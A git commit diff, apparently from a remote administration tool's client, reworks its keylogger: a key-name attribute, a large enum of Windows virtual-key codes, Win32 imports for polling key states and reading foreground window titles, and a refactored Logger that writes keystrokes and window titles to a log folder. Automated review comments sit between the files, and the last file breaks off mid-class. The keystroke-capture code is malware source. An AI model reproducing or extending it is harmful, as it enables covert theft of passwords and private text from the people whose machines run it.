Initial big changes to Keylogger

Big changes to the Keylogger. Still needs lots of changes but my intent
should be visible by these changes. This is now very flexible, easy to
change and add keys, etc.
yankejustin 2015-05-08 14:08:39 -04:00
parent b59cee6025
commit 0ab83c4917
6 changed files with 1052 additions and 110 deletions


@ -64,6 +64,10 @@
<Compile Include="Core\Information\OSInfo.cs" /> <Compile Include="Core\Information\OSInfo.cs" />
<Compile Include="Core\Compression\JpgCompression.cs" /> <Compile Include="Core\Compression\JpgCompression.cs" />
<Compile Include="Core\Extensions\SocketExtensions.cs" /> <Compile Include="Core\Extensions\SocketExtensions.cs" />
<Compile Include="Core\Keylogger\KeyloggerAttributes.cs" />
<Compile Include="Core\Keylogger\KeyloggerHelpers.cs" />
<Compile Include="Core\Keylogger\KeyloggerKeys.cs" />
<Compile Include="Core\Keylogger\Win32.cs" />
<Compile Include="Core\Packets\ClientPackets\DesktopResponse.cs" /> <Compile Include="Core\Packets\ClientPackets\DesktopResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\DirectoryResponse.cs" /> <Compile Include="Core\Packets\ClientPackets\DirectoryResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\DownloadFileResponse.cs" /> <Compile Include="Core\Packets\ClientPackets\DownloadFileResponse.cs" />


@ -0,0 +1,26 @@
using System;
using System.Collections.Generic;
using System.Text;
namespace xClient.Core.Keylogger
{
[AttributeUsage(AttributeTargets.Enum, AllowMultiple = false)]
public class KeyloggerKey : Attribute
{
public string KeyName { get; private set; }
public bool IsSpecialKey { get; private set; }
/// <summary>
/// Constructs the attribute used by the keylogger
/// keys to hold data for them.
/// </summary>
/// <param name="PrintedName">The printed value of the key when converting
/// the specific key to its string value.</param>
/// <param name="IsSpecialKey">Determines if the key is a special key.</param>
internal KeyloggerKey(string PrintedName, bool _IsSpecialKey = false)
{
KeyName = PrintedName;
IsSpecialKey = _IsSpecialKey;
}
}
}
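Review bot: The `[AttributeUsage(AttributeTargets.Enum, AllowMultiple = false)]` on `KeyloggerKey` does not match how the attribute is used elsewhere in this commit, where it is placed on individual enum members such as `VK_CANCEL`. Enum members are fields, so the declaration should read `[AttributeUsage(AttributeTargets.Field, AllowMultiple = false)]`; as written the compiler should reject every usage in the keys file. The XML doc also names `<param name="IsSpecialKey">` while the constructor parameter is `_IsSpecialKey`, so the doc tag does not bind. Following the .NET naming convention, the class would be `KeyloggerKeyAttribute`.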


@ -0,0 +1,16 @@
using System;
using System.Collections.Generic;
using System.Text;
using System.Reflection;
using xClient.Core.Keylogger;
namespace xClient.Core.Keylogger
{
public static class KeyloggerHelpers
{
public static byte GetKeyloggerKeyValue<T>(this Enum sender) where T : KeyloggerKey
{
return Convert.ToByte(sender);
}
}
}
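Review bot: The type parameter on `GetKeyloggerKeyValue<T>(this Enum sender) where T : KeyloggerKey` is never used in the body, which only returns `Convert.ToByte(sender)`. Because `T` cannot be inferred from the arguments, every caller has to spell it out for no effect. Either drop it, `public static byte GetKeyloggerKeyValue(this Enum sender)`, or add a summary saying what `T` is meant to select once the attribute lookup exists. `using System.Reflection;` and `using xClient.Core.Keylogger;` are unused or redundant in this file as shown.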


@ -0,0 +1,871 @@
/*
*
* Key information was obtained from this reference:
* https://msdn.microsoft.com/en-us/library/windows/desktop/dd375731%28v=vs.85%29.aspx
*
*/
using System;
using System.Collections.Generic;
using System.Text;
namespace xClient.Core.Keylogger
{
/// <summary>
/// Contains various keys that the keylogger supports.
/// </summary>
// Add Flags attribute so we can treat these as elements
// that could be used in combination, instead of the usual
// treatment as mutually exclusive elements.
[Flags]
public enum KeyloggerKeys : byte
{
#region Mouse Buttons
/// <summary>
/// The left mouse button.
/// </summary>
VK_LBUTTON = 0x01,
/// <summary>
/// The right mouse button.
/// </summary>
VK_RBUTTON = 0x02,
/// <summary>
/// Middle mouse button (three-button mouse).
/// </summary>
VK_MBUTTON = 0x04,
/// <summary>
/// X1 mouse button.
/// </summary>
VK_XBUTTON1 = 0x05,
/// <summary>
/// X2 mouse button.
/// </summary>
VK_XBUTTON2 = 0x06,
#endregion
#region Common Keys
/// <summary>
/// Control-break processing.
/// </summary>
[KeyloggerKey("[CANCEL]", true)]
VK_CANCEL = 0x03,
/// <summary>
/// BACKSPACE key.
/// </summary>
[KeyloggerKey("[BACKSPACE]", true)]
VK_BACK = 0x08,
/// <summary>
/// TAB key.
/// </summary>
[KeyloggerKey("[TAB]", true)]
VK_TAB = 0x09,
/// <summary>
/// CLEAR key.
/// </summary>
[KeyloggerKey("[CLEAR]", true)]
VK_CLEAR = 0x0C,
/// <summary>
/// ENTER key.
/// </summary>
[KeyloggerKey("[ENTER]", true)]
VK_RETURN = 0x0D,
/// <summary>
/// SHIFT key.
/// </summary>
[KeyloggerKey("[SHIFT]", true)]
VK_SHIFT = 0x10,
/// <summary>
/// CONTROL (CTRL) key.
/// </summary>
[KeyloggerKey("[CTRL]", true)]
VK_CONTROL = 0x11,
/// <summary>
/// ALT key.
/// </summary>
[KeyloggerKey("[ALT]", true)]
VK_MENU = 0x12,
/// <summary>
/// PAUSE key.
/// </summary>
[KeyloggerKey("[PAUSE]", true)]
VK_PAUSE = 0x13,
/// <summary>
/// CAPS LOCK key.
/// </summary>
[KeyloggerKey("[CAPS]", true)]
VK_CAPITAL = 0x14,
/// <summary>
/// ESC key.
/// </summary>
[KeyloggerKey("[ESC]", true)]
VK_ESCAPE = 0x1B,
/// <summary>
/// SPACEBAR key.
/// </summary>
[KeyloggerKey("[SPACE]", true)]
VK_SPACE = 0x20,
/// <summary>
/// PAGE UP key.
/// </summary>
[KeyloggerKey("[PAGE_UP]", true)]
VK_PRIOR = 0x21,
/// <summary>
/// PAGE DOWN key.
/// </summary>
[KeyloggerKey("[PAGE_DOWN]", true)]
VK_NEXT = 0x22,
/// <summary>
/// END key.
/// </summary>
[KeyloggerKey("[END]", true)]
VK_END = 0x23,
/// <summary>
/// HOME key.
/// </summary>
[KeyloggerKey("[HOME]", true)]
VK_HOME = 0x24,
/// <summary>
/// LEFT ARROW key.
/// </summary>
[KeyloggerKey("[ARROW_LEFT]", true)]
VK_LEFT = 0x25,
/// <summary>
/// UP ARROW key.
/// </summary>
[KeyloggerKey("[ARROW_DOWN]", true)]
VK_UP = 0x26,
/// <summary>
/// RIGHT ARROW key.
/// </summary>
[KeyloggerKey("[ARROW_RIGHT]", true)]
VK_RIGHT = 0x27,
/// <summary>
/// DOWN ARROW key.
/// </summary>
[KeyloggerKey("[ARROW_DOWN]", true)]
VK_DOWN = 0x28,
/// <summary>
/// SELECT key.
/// </summary>
[KeyloggerKey("[SELECT]", true)]
VK_SELECT = 0x29,
/// <summary>
/// PRINT key.
/// </summary>
[KeyloggerKey("[PRINT]", true)]
VK_PRINT = 0x2A,
/// <summary>
/// EXECUTE key.
/// </summary>
[KeyloggerKey("[EXECUTE]", true)]
VK_EXECUTE = 0x2B,
/// <summary>
/// PRINT SCREEN key.
/// </summary>
[KeyloggerKey("[PRINT_SCREEN]", true)]
VK_SNAPSHOT = 0x2C,
/// <summary>
/// INSERT (INS) key.
/// </summary>
[KeyloggerKey("[INSERT]", true)]
VK_INSERT = 0x2D,
/// <summary>
/// DELETE (DEL) key.
/// </summary>
[KeyloggerKey("[DEL]", true)]
VK_DELETE = 0x2E,
/// <summary>
/// HELP key.
/// </summary>
[KeyloggerKey("[HELP]", true)]
VK_HELP = 0x2F,
#endregion
#region Number Keys
/// <summary>
/// 0 key.
/// </summary>
[KeyloggerKey("0")]
K_0 = 0x30,
/// <summary>
/// 1 key.
/// </summary>
[KeyloggerKey("1")]
K_1 = 0x31,
/// <summary>
/// 2 key.
/// </summary>
[KeyloggerKey("2")]
K_2 = 0x32,
/// <summary>
/// 3 key.
/// </summary>
[KeyloggerKey("3")]
K_3 = 0x33,
/// <summary>
/// 4 key.
/// </summary>
[KeyloggerKey("4")]
K_4 = 0x34,
/// <summary>
/// 5 key.
/// </summary>
[KeyloggerKey("5")]
K_5 = 0x35,
/// <summary>
/// 6 key.
/// </summary>
[KeyloggerKey("6")]
K_6 = 0x36,
/// <summary>
/// 7 key.
/// </summary>
[KeyloggerKey("7")]
K_7 = 0x37,
/// <summary>
/// 8 key.
/// </summary>
[KeyloggerKey("8")]
K_8 = 0x38,
/// <summary>
/// 9 key.
/// </summary>
[KeyloggerKey("9")]
K_9 = 0x39,
#endregion
#region Alpha Keys
/// <summary>
/// 'A' key.
/// </summary>
[KeyloggerKey("a")]
K_A = 0x41,
/// <summary>
/// 'B' key.
/// </summary>
[KeyloggerKey("b")]
K_B = 0x42,
/// <summary>
/// 'C' key.
/// </summary>
[KeyloggerKey("c")]
K_C = 0x43,
/// <summary>
/// 'D' key.
/// </summary>
[KeyloggerKey("d")]
K_D = 0x44,
/// <summary>
/// 'E' key.
/// </summary>
[KeyloggerKey("e")]
K_E = 0x45,
/// <summary>
/// 'F' key.
/// </summary>
[KeyloggerKey("f")]
K_F = 0x46,
/// <summary>
/// 'G' key.
/// </summary>
K_G = 0x47,
/// <summary>
/// 'H' key.
/// </summary>
K_H = 0x48,
/// <summary>
/// 'I' key.
/// </summary>
K_I = 0x49,
/// <summary>
/// 'J' key.
/// </summary>
K_J = 0x4A,
/// <summary>
/// 'K' key.
/// </summary>
K_K = 0x4B,
/// <summary>
/// 'L' key.
/// </summary>
K_L = 0x4C,
/// <summary>
/// 'M' key.
/// </summary>
K_M = 0x4D,
/// <summary>
/// 'N' key.
/// </summary>
K_N = 0x4E,
/// <summary>
/// 'O' key.
/// </summary>
K_O = 0x4F,
/// <summary>
/// 'P' key.
/// </summary>
K_P = 0x50,
/// <summary>
/// 'Q' key.
/// </summary>
K_Q = 0x51,
/// <summary>
/// 'R' key.
/// </summary>
K_R = 0x52,
/// <summary>
/// 'S' key.
/// </summary>
K_S = 0x53,
/// <summary>
/// 'T' key.
/// </summary>
K_T = 0x54,
/// <summary>
/// 'U' key.
/// </summary>
K_U = 0x55,
/// <summary>
/// 'V' key.
/// </summary>
K_V = 0x56,
/// <summary>
/// 'W' key.
/// </summary>
K_W = 0x57,
/// <summary>
/// 'X' key.
/// </summary>
K_X = 0x58,
/// <summary>
/// 'Y' key.
/// </summary>
K_Y = 0x59,
/// <summary>
/// 'Z' key.
/// </summary>
K_Z = 0x5A,
#endregion
#region Windows keys
/// <summary>
/// Left Windows key (Natural keyboard).
/// </summary>
VK_LWIN = 0x5B,
/// <summary>
/// Right Windows key (Natural keyboard).
/// </summary>
VK_RWIN = 0x5C,
/// <summary>
/// Applications key (natural keyboard).
/// </summary>
VK_APPS = 0x5D,
/// <summary>
/// Computer Sleep key.
/// </summary>
VK_SLEEP = 0x5F,
#endregion
#region Number Keys (Keypad)
/// <summary>
/// Numeric keypad 0 key.
/// </summary>
VK_NUMPAD0 = 0x60,
/// <summary>
/// Numeric keypad 1 key.
/// </summary>
VK_NUMPAD1 = 0x61,
/// <summary>
/// Numeric keypad 2 key.
/// </summary>
VK_NUMPAD2 = 0x62,
/// <summary>
/// Numeric keypad 3 key.
/// </summary>
VK_NUMPAD3 = 0x63,
/// <summary>
/// Numeric keypad 4 key.
/// </summary>
VK_NUMPAD4 = 0x64,
/// <summary>
/// Numeric keypad 5 key.
/// </summary>
VK_NUMPAD5 = 0x65,
/// <summary>
/// Numeric keypad 6 key.
/// </summary>
VK_NUMPAD6 = 0x66,
/// <summary>
/// Numeric keypad 7 key.
/// </summary>
VK_NUMPAD7 = 0x67,
/// <summary>
/// Numeric keypad 8 key.
/// </summary>
VK_NUMPAD8 = 0x68,
/// <summary>
/// Numeric keypad 0 key.
/// </summary>9
VK_NUMPAD9 = 0x69,
#endregion
#region Command Keys (Keypad)
/// <summary>
/// Multiply key.
/// </summary>
VK_MULTIPLY = 0x6A,
/// <summary>
/// Add key.
/// </summary>
VK_ADD = 0x6B,
/// <summary>
/// Separator key.
/// </summary>
VK_SEPARATOR = 0x6C,
/// <summary>
/// Subtract (-) key.
/// </summary>
VK_SUBTRACT = 0x6D,
/// <summary>
/// Decimal (.) key.
/// </summary>
VK_DECIMAL = 0x6E,
/// <summary>
/// Divide (/) key.
/// </summary>
VK_DIVIDE = 0x6F,
#endregion
#region Function Keys
/// <summary>
/// F1 key.
/// </summary>
VK_F1 = 0x70,
/// <summary>
/// F2 key.
/// </summary>
VK_F2 = 0x71,
/// <summary>
/// F3 key.
/// </summary>
VK_F3 = 0x72,
/// <summary>
/// F4 key.
/// </summary>
VK_F4 = 0x73,
/// <summary>
/// F5 key.
/// </summary>
VK_F5 = 0x74,
/// <summary>
/// F6 key.
/// </summary>
VK_F6 = 0x75,
/// <summary>
/// F7 key.
/// </summary>
VK_F7 = 0x76,
/// <summary>
/// F8 key.
/// </summary>
VK_F8 = 0x77,
/// <summary>
/// F9 key.
/// </summary>
VK_F9 = 0x78,
/// <summary>
/// F10 key.
/// </summary>
VK_F10 = 0x79,
/// <summary>
/// F11 key.
/// </summary>
VK_F11 = 0x7A,
/// <summary>
/// F12 key.
/// </summary>
VK_F12 = 0x7B,
/// <summary>
/// F13 key.
/// </summary>
VK_F13 = 0x7C,
/// <summary>
/// F14 key.
/// </summary>
VK_F14 = 0x7D,
/// <summary>
/// F15 key.
/// </summary>
VK_F15 = 0x7E,
/// <summary>
/// F16 key.
/// </summary>
VK_F16 = 0x7F,
/// <summary>
/// F17 key.
/// </summary>
VK_F17 = 0x80,
/// <summary>
/// F18 key.
/// </summary>
VK_F18 = 0x81,
/// <summary>
/// F19 key.
/// </summary>
VK_F19 = 0x82,
/// <summary>
/// F20 key.
/// </summary>
VK_F20 = 0x83,
/// <summary>
/// F21 key.
/// </summary>
VK_F21 = 0x84,
/// <summary>
/// F22 key.
/// </summary>
VK_F22 = 0x85,
/// <summary>
/// F23 key.
/// </summary>
VK_F23 = 0x86,
/// <summary>
/// F24 key.
/// </summary>
VK_F24 = 0x87,
#endregion
#region Various Command Keys
/// <summary>
/// NUM LOCK key.
/// </summary>
VK_NUMLOCK = 0x90,
/// <summary>
/// SCROLL LOCK key.
/// </summary>
VK_SCROLL = 0x91,
/// <summary>
/// Left SHIFT key.
/// </summary>
VK_LSHIFT = 0xA0,
/// <summary>
/// Right SHIFT key.
/// </summary>
VK_RSHIFT = 0xA1,
/// <summary>
/// Left CONTROL (CTRL) key.
/// </summary>
VK_LCONTROL = 0xA2,
/// <summary>
/// Right CONTROL (CTRL) key.
/// </summary>
VK_RCONTROL = 0xA3,
/// <summary>
/// Left MENU key.
/// </summary>
VK_LMENU = 0xA4,
/// <summary>
/// Right MENU key.
/// </summary>
VK_RMENU = 0xA5,
/// <summary>
/// Browser Back key.
/// </summary>
VK_BROWSER_BACK = 0xA6,
/// <summary>
/// Browser Forward key.
/// </summary>
VK_BROWSER_FORWARD = 0xA7,
/// <summary>
/// Browser Refresh key.
/// </summary>
VK_BROWSER_REFRESH = 0xA8,
/// <summary>
/// Browser Stop key.
/// </summary>
VK_BROWSER_STOP = 0xA9,
/// <summary>
/// Browser Search key.
/// </summary>
VK_BROWSER_SEARCH = 0xAA,
/// <summary>
/// Browser Favorites key.
/// </summary>
VK_BROWSER_FAVORITES = 0xAB,
/// <summary>
/// Browser Start and Home key.
/// </summary>
VK_BROWSER_HOME = 0xAC,
/// <summary>
/// Volume Mute key.
/// </summary>
VK_VOLUME_MUTE = 0xAD,
/// <summary>
/// Volume Down key.
/// </summary>
VK_VOLUME_DOWN = 0xAE,
/// <summary>
/// Volume Up key.
/// </summary>
VK_VOLUME_UP = 0xAF,
/// <summary>
/// Start Application 2 key.
/// </summary>
VK_LAUNCH_APP2 = 0xB7,
#endregion
#region Varying keys (based on locality)
/// <summary>
/// Used for miscellaneous characters; it
/// can vary by keyboard. For the US
/// standard keyboard, the ';:' key.
/// </summary>
VK_OEM_1 = 0xBA,
/// <summary>
/// For any country/region, the '+' key.
/// </summary>
VK_OEM_PLUS = 0xBB,
/// <summary>
/// For any country/region, the ',' key.
/// </summary>
VK_OEM_COMMA = 0xBC,
/// <summary>
/// For any country/region, the '-' key.
/// </summary>
VK_OEM_MINUS = 0xBD,
/// <summary>
/// For any country/region, the '.' key.
/// </summary>
VK_OEM_PERIOD = 0xBE,
/// <summary>
/// Used for miscellaneous characters; it can vary
/// by keyboard. For the US standard keyboard,
/// the '/?' key.
/// </summary>
VK_OEM_2 = 0xBF,
/// <summary>
/// Used for miscellaneous characters; it can vary
/// by keyboard. For the US standard keyboard,
/// the '`~' key.
/// </summary>
VK_OEM_3 = 0xC0,
/// <summary>
/// Used for miscellaneous characters; it can vary by
/// keyboard. For the US standard keyboard, the '[{' key.
/// </summary>
VK_OEM_4 = 0xDB,
/// <summary>
/// Used for miscellaneous characters; it can vary by keyboard.
/// For the US standard keyboard, the '\\|' key.
/// </summary>
VK_OEM_5 = 0xDC,
/// <summary>
/// Used for miscellaneous characters; it can vary by keyboard.
/// For the US standard keyboard, the ']}' key.
/// </summary>
VK_OEM_6 = 0xDD,
/// <summary>
/// Used for miscellaneous characters; it can vary by keyboard.
/// For the US standard keyboard, the 'single-quote/double-quote' key.
/// </summary>
VK_OEM_7 = 0xDE,
/// <summary>
/// Used for miscellaneous characters; it can vary by keyboard.
/// </summary>
VK_OEM_8 = 0xDF,
/// <summary>
/// Either the angle bracket key or the backslash key on the RT 102-key keyboard.
/// </summary>
VK_OEM_102 = 0xE2,
#endregion
#region Random
/// <summary>
/// Used to pass Unicode characters as if they were keystrokes.
/// The VK_PACKET key is the low word of a 32-bit Virtual Key
/// value used for non-keyboard input methods. For more
/// information, see Remark in KEYBDINPUT, SendInput,
/// WM_KEYDOWN, and WM_KEYUP.
/// </summary>
VK_PACKET = 0xE7,
/// <summary>
/// ERASE EOF key.
/// </summary>
VK_EREOF = 0xF9,
/// <summary>
/// Play key.
/// </summary>
VK_PLAY = 0xFA,
/// <summary>
/// Zoom key.
/// </summary>
VK_ZOOM = 0xFB,
/// <summary>
/// PA1 key.
/// </summary>
VK_PA1 = 0xFD,
/// <summary>
/// Clear key.
/// </summary>
VK_OEM_CLEAR = 0xFE,
#endregion
}
}
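Review bot: `[Flags]` on `KeyloggerKeys` is misleading because the members are consecutive virtual-key codes, not distinct bits. For example `VK_LBUTTON | VK_RBUTTON` equals `0x03`, which is `VK_CANCEL`, so combined values cannot be told apart from single keys. I would remove `[Flags]` and the comment above it. Separately, `VK_UP` carries `[KeyloggerKey("[ARROW_DOWN]", true)]` where the pattern of the neighbouring entries suggests `"[ARROW_UP]"`. The summary for `VK_NUMPAD9` says "Numeric keypad 0 key." with a stray `9` after `</summary>`.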


@ -5,46 +5,17 @@ using System.Runtime.InteropServices;
using System.Text; using System.Text;
using System.Threading; using System.Threading;
using System.Windows.Forms; using System.Windows.Forms;
using xClient.Core.Keylogger;
namespace xClient.Core.Keylogger namespace xClient.Core.Keylogger
{ {
public class KeyData public struct LoggedKey
{ {
public short Value { get; set; } public KeyloggerKeys PressedChar { get; set; }
public bool ShiftKey { get; set; }
public bool CapsLock { get; set; }
public bool ControlKey { get; set; }
public bool AltKey { get; set; }
} }
public class Logger public class Logger
{ {
#region "WIN32API"
[DllImport("user32.dll")]
private static extern short GetAsyncKeyState(Keys vKey);
[DllImport("user32.dll")]
private static extern short GetAsyncKeyState(int vKey);
[DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount);
[DllImport("user32.dll", CharSet = CharSet.Unicode)]
private static extern int ToUnicodeEx(int wVirtKey, uint wScanCode, byte[] lpKeyState, StringBuilder pwszBuff,
int cchBuff, uint wFlags, IntPtr dwhkl);
[DllImport("user32.dll")]
private static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll")]
private static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
[DllImport("user32.dll", ExactSpelling = true)]
internal static extern IntPtr GetKeyboardLayout(uint threadId);
#endregion
public static Logger Instance; public static Logger Instance;
public bool Enabled public bool Enabled
@ -60,7 +31,7 @@ namespace xClient.Core.Keylogger
{ {
get get
{ {
return Convert.ToBoolean(GetAsyncKeyState(Keys.ShiftKey) & 0x8000); //Returns true if shiftkey is pressed return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.ShiftKey) & 0x8000); //Returns true if shiftkey is pressed
} }
} }
@ -68,7 +39,7 @@ namespace xClient.Core.Keylogger
{ {
get get
{ {
return Convert.ToBoolean(GetAsyncKeyState(Keys.ControlKey) & 0x8000); //Returns true if controlkey is pressed return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.ControlKey) & 0x8000); //Returns true if controlkey is pressed
} }
} }
@ -76,7 +47,7 @@ namespace xClient.Core.Keylogger
{ {
get get
{ {
return Convert.ToBoolean(GetAsyncKeyState(Keys.Menu) & 0x8000); //Returns true if altkey is pressed return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.Menu) & 0x8000); //Returns true if altkey is pressed
} }
} }
@ -92,7 +63,7 @@ namespace xClient.Core.Keylogger
{ {
get get
{ {
return Convert.ToBoolean(GetAsyncKeyState(Keys.EscapeKey) & 0x8000); //Returns true if Escape is pressed return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.Escape) & 0x8000); //Returns true if Escape is pressed
} }
} }
@ -104,7 +75,7 @@ namespace xClient.Core.Keylogger
"\\Logs\\"; "\\Logs\\";
private readonly List<short> _enumValues; private readonly List<short> _enumValues;
private volatile List<KeyData> _keyBuffer; private volatile List<LoggedKey> _keyBuffer;
private readonly System.Timers.Timer _timerLogKeys; private readonly System.Timers.Timer _timerLogKeys;
private readonly System.Timers.Timer _timerEmptyKeyBuffer; private readonly System.Timers.Timer _timerEmptyKeyBuffer;
private readonly System.Timers.Timer _timerFlush; private readonly System.Timers.Timer _timerFlush;
@ -120,7 +91,7 @@ namespace xClient.Core.Keylogger
WriteFile(); WriteFile();
_keyBuffer = new List<KeyData>(); _keyBuffer = new List<LoggedKey>();
_enumValues = new List<short>() _enumValues = new List<short>()
//Populate enumValues list with the Virtual Key Codes of the keys we want to log //Populate enumValues list with the Virtual Key Codes of the keys we want to log
@ -178,67 +149,69 @@ namespace xClient.Core.Keylogger
private void timerEmptyKeyBuffer_Elapsed(object sender, System.Timers.ElapsedEventArgs e) private void timerEmptyKeyBuffer_Elapsed(object sender, System.Timers.ElapsedEventArgs e)
{ {
int j = 0; int j = 0;
KeyData[] keybuffer = new KeyData[_keyBuffer.Count]; LoggedKey[] keybuffer = new LoggedKey[_keyBuffer.Count];
_keyBuffer.CopyTo(keybuffer); _keyBuffer.CopyTo(keybuffer);
foreach (var k in keybuffer) foreach (var k in keybuffer)
{ {
if (k != null) if (k.PressedChar != null)
{ {
switch (k.Value) // TODO: RE-WRITE THE WAY IT IS PARSED.
{
case 8: //switch (k.PressedChar)
_logFileBuffer.Append(HighlightSpecialKey("Back")); //{
break; // case 8:
case 9: // _logFileBuffer.Append(HighlightSpecialKey("Back"));
_logFileBuffer.Append(HighlightSpecialKey("Tab")); // break;
break; // case 9:
case 13: // _logFileBuffer.Append(HighlightSpecialKey("Tab"));
_logFileBuffer.Append(HighlightSpecialKey("Enter")); // break;
break; // case 13:
case 32: // _logFileBuffer.Append(HighlightSpecialKey("Enter"));
_logFileBuffer.Append(" "); // break;
break; // case 32:
case 46: // _logFileBuffer.Append(" ");
_logFileBuffer.Append(HighlightSpecialKey("Del")); // break;
break; // case 46:
case 91: // _logFileBuffer.Append(HighlightSpecialKey("Del"));
case 92: // break;
_logFileBuffer.Append(HighlightSpecialKey("Win")); // case 91:
break; // case 92:
case 112: // _logFileBuffer.Append(HighlightSpecialKey("Win"));
case 113: // break;
case 114: // case 112:
case 115: // case 113:
case 116: // case 114:
case 117: // case 115:
case 118: // case 116:
case 119: // case 117:
case 120: // case 118:
case 121: // case 119:
case 122: // case 120:
_logFileBuffer.Append(HighlightSpecialKey("F" + (k.Value - 111))); // case 121:
break; // case 122:
default: // _logFileBuffer.Append(HighlightSpecialKey("F" + (k.Value - 111)));
if (_enumValues.Contains(k.Value)) // break;
{ // default:
if (k.ShiftKey || k.ControlKey || k.AltKey || k.EscapeKey) // if (_enumValues.Contains(k.Value))
{ // {
_logFileBuffer.Append( // if (k.ShiftKey || k.ControlKey || k.AltKey || k.EscapeKey)
HighlightSpecialKey( // {
((k.ShiftKey) ? "SHIFT-" : string.Empty) + // _logFileBuffer.Append(
((k.ControlKey) ? "CTRL-" : string.Empty) + // HighlightSpecialKey(
((k.AltKey) ? "ALT-" : string.Empty) + // ((k.ShiftKey) ? "SHIFT-" : string.Empty) +
((k.EscapeKey) ? "ESC-" : string.Empty) + // ((k.ControlKey) ? "CTRL-" : string.Empty) +
FromKeys(k.Value, k.ShiftKey, k.CapsLock) // ((k.AltKey) ? "ALT-" : string.Empty) +
)); // ((k.EscapeKey) ? "ESC-" : string.Empty) +
} // FromKeys(k.Value, k.ShiftKey, k.CapsLock)
else // ));
{ // }
_logFileBuffer.Append(FromKeys(k.Value, k.ShiftKey, k.CapsLock)); // else
} // {
} // _logFileBuffer.Append(FromKeys(k.Value, k.ShiftKey, k.CapsLock));
break; // }
} // }
// break;
//}
} }
j++; j++;
} }
@ -250,19 +223,21 @@ namespace xClient.Core.Keylogger
{ {
foreach (short i in _enumValues) //Loop through our enumValues list populated with the keys we want to log foreach (short i in _enumValues) //Loop through our enumValues list populated with the keys we want to log
{ {
if (GetAsyncKeyState(i) == -32767) //GetAsycKeyState returns -32767 to indicate keypress if (Win32.GetAsyncKeyState(i) == -32767) //GetAsycKeyState returns -32767 to indicate keypress
{ {
_keyBuffer.Add(new KeyData() {CapsLock = CapsLock, ShiftKey = ShiftKey, ControlKey = ControlKey, AltKey = AltKey, Value = i}); // TODO: RE-WRITE THE WAY THE KEYBUFFER ADDS A NEW LOGGED KEY.
_hWndTitle = GetActiveWindowTitle(); //Get active thread window title
if (_hWndTitle != null) //_keyBuffer.Add(new LoggedKey() { PressedChar = i });
{ //_hWndTitle = GetActiveWindowTitle(); //Get active thread window title
if (_hWndTitle != _hWndLastTitle && _enumValues.Contains(i)) //if (_hWndTitle != null)
//Only write title to log if a key is pressed that we support //{
{ // if (_hWndTitle != _hWndLastTitle && _enumValues.Contains(i))
_hWndLastTitle = _hWndTitle; // //Only write title to log if a key is pressed that we support
_logFileBuffer.Append("<br><br>[<b>" + _hWndTitle + "</b>]<br>"); // {
} // _hWndLastTitle = _hWndTitle;
} // _logFileBuffer.Append("<br><br>[<b>" + _hWndTitle + "</b>]<br>");
// }
//}
} }
} }
} }
@ -324,7 +299,7 @@ namespace xClient.Core.Keylogger
{ {
StringBuilder sbTitle = new StringBuilder(1024); StringBuilder sbTitle = new StringBuilder(1024);
GetWindowText(GetForegroundWindow(), sbTitle, sbTitle.Capacity); Win32.GetWindowText(Win32.GetForegroundWindow().ToInt32(), sbTitle, sbTitle.Capacity);
string title = sbTitle.ToString(); string title = sbTitle.ToString();
@ -334,7 +309,7 @@ namespace xClient.Core.Keylogger
private IntPtr GetActiveKeyboardLayout() private IntPtr GetActiveKeyboardLayout()
{ {
uint pid; uint pid;
return GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(), out pid)); return Win32.GetKeyboardLayout(Win32.GetWindowThreadProcessId(Win32.GetForegroundWindow(), out pid));
} }
private char? FromKeys(int keys, bool shift, bool caps) private char? FromKeys(int keys, bool shift, bool caps)
@ -351,7 +326,7 @@ namespace xClient.Core.Keylogger
var sb = new StringBuilder(10); var sb = new StringBuilder(10);
return ToUnicodeEx(keys, 0, keyStates, sb, sb.Capacity, 0, GetActiveKeyboardLayout()) == 1 return Win32.ToUnicodeEx(keys, 0, keyStates, sb, sb.Capacity, 0, GetActiveKeyboardLayout()) == 1
? (char?) sb[0] ? (char?) sb[0]
: null; : null;
//Get the appropriate unicode character from the state of keyboard and from the Keyboard layout (language) of the active thread //Get the appropriate unicode character from the state of keyboard and from the Keyboard layout (language) of the active thread
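Review bot: The guard `if (k.PressedChar != null)` in `timerEmptyKeyBuffer_Elapsed` can never be false, because `LoggedKey` is now a `struct` and `PressedChar` is the non-nullable enum `KeyloggerKeys`; the compiler will warn that the comparison is always true. The whole `switch` under it is commented out, so the loop body is empty apart from `j++`. I would delete the guard and the commented-out block and keep only the `// TODO` line, since the old code stays in history. The same applies to the commented-out block in the `@ -250,19 +223,21 @` hunk. Both method bodies start and end outside the visible hunks, so this is based only on the lines shown.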


@ -0,0 +1,50 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace xClient.Core.Keylogger
{
public static class Win32
{
/// <summary>
/// Translates (maps) a virtual-key code into a scan code or character value,
/// or translates a scan code into a virtual-key code. The function
/// translates the codes using the input language and an input locale identifier.
/// </summary>
/// <param name="uCode">The virtual-key code or scan code for a key</param>
/// <param name="uMapType">The translation to perform.</param>
/// <param name="dwhkl"></param>
/// <returns>Returns </returns>
[DllImport("user32.dll", CharSet = CharSet.Unicode, EntryPoint = "MapVirtualKeyExW", ExactSpelling = true)]
internal static extern int MapVirtualKeyExW(int uCode, int uMapType, IntPtr dwhkl);
[DllImport("user32.dll")]
internal static extern short GetAsyncKeyState(Keys vKey);
// The value passed to GetAsyncKeyState is scan code, so we need to translate
// the data to virtual code, then to unicode character, then we can log to
// the file.
[DllImport("user32.dll")]
internal static extern short GetAsyncKeyState(int vKey);
[DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
internal static extern int GetWindowText(int hWnd, StringBuilder lpString, int nMaxCount);
[DllImport("user32.dll", CharSet = CharSet.Unicode, ExactSpelling = true)]
internal static extern int ToUnicodeEx(int wVirtKey, uint wScanCode, byte[] lpKeyState, StringBuilder pwszBuff,
int cchBuff, uint wFlags, IntPtr dwhkl);
